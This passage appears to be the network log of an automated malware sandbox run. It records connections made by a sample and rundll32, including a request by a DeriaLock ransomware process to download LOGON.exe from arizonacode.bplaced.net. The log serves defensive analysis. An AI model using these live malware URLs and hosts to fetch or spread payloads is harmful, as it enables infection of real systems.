                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                13140.82.121.4443192.168.2.349689C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                14192.168.2.349690185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                15185.199.108.133443192.168.2.349690C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                16192.168.2.349691140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                17140.82.121.4443192.168.2.349691C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                18192.168.2.349692185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                19185.199.108.133443192.168.2.349692C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                2192.168.2.34968323.50.105.163443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                20192.168.2.349693140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                21140.82.121.4443192.168.2.349693C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                22192.168.2.349694185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                23185.199.108.133443192.168.2.349694C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                24192.168.2.349695140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                25140.82.121.4443192.168.2.349695C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                26192.168.2.349696185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                27185.199.108.133443192.168.2.349696C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                28192.168.2.349698140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                29140.82.121.4443192.168.2.349698C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                3192.168.2.34968423.50.105.163443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                30192.168.2.349699185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                31185.199.108.133443192.168.2.349699C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                32192.168.2.349708140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                33140.82.121.4443192.168.2.349708C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                34192.168.2.349710185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                35185.199.108.133443192.168.2.349710C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                36192.168.2.349717140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                37140.82.121.4443192.168.2.349717C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                38192.168.2.349718185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                39185.199.108.133443192.168.2.349718C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                4192.168.2.349685140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                40192.168.2.349719140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                41140.82.121.4443192.168.2.349719C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                42192.168.2.349720185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                43185.199.108.133443192.168.2.349720C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                44192.168.2.349721140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                45140.82.121.4443192.168.2.349721C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                46192.168.2.349722185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                47185.199.108.133443192.168.2.349722C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                48192.168.2.349735140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                49140.82.121.4443192.168.2.349735C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                5140.82.121.4443192.168.2.349685C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                50192.168.2.349737185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                51185.199.108.133443192.168.2.349737C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                52192.168.2.349738140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                53140.82.121.4443192.168.2.349738C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                54192.168.2.349739185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                55185.199.108.133443192.168.2.349739C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                56192.168.2.349740140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                57140.82.121.4443192.168.2.349740C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                58192.168.2.349742185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                59185.199.108.133443192.168.2.349742C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                6192.168.2.349686185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                60192.168.2.349744140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                61140.82.121.4443192.168.2.349744C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                62192.168.2.349745185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                63185.199.108.133443192.168.2.349745C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                64192.168.2.349749140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                65140.82.121.4443192.168.2.349749C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                66192.168.2.349752185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                67185.199.108.133443192.168.2.349752C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                68192.168.2.349755140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                69140.82.121.4443192.168.2.349755C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                7185.199.108.133443192.168.2.349686C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                70192.168.2.349757185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                71185.199.108.133443192.168.2.349757C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                72192.168.2.349754104.208.16.94443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                73192.168.2.349759140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                74140.82.121.4443192.168.2.349759C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                75192.168.2.349760185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                76185.199.108.133443192.168.2.349760C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                77192.168.2.349767140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                78140.82.121.4443192.168.2.349767C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                79192.168.2.349768185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                8192.168.2.349687140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                80185.199.108.133443192.168.2.349768C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                81192.168.2.349770104.208.16.94443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                82192.168.2.34977577.88.55.50443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                83192.168.2.349781140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                84140.82.121.4443192.168.2.349781C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                85192.168.2.349782185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                86185.199.108.133443192.168.2.349782C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                87192.168.2.349727172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:17.364089966 CEST4411OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                88172.217.168.1480192.168.2.349727C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:17.410073996 CEST4412INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:17 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:49:17 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                89192.168.2.349732172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:19.597035885 CEST4413OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                9140.82.121.4443192.168.2.349687C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                90172.217.168.1480192.168.2.349732C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:19.641099930 CEST4413INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:19 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:49:19 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                91192.168.2.349733162.55.0.13780C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:19.743745089 CEST4414OUTGET /HF/SystemLocker/UNLOCKKEYS/LOGON.exe HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                92162.55.0.13780192.168.2.349733C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:19.767294884 CEST4415INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:19 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=107
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                Connection: Upgrade, Keep-Alive
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Keep-Alive: timeout=4, max=500
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f
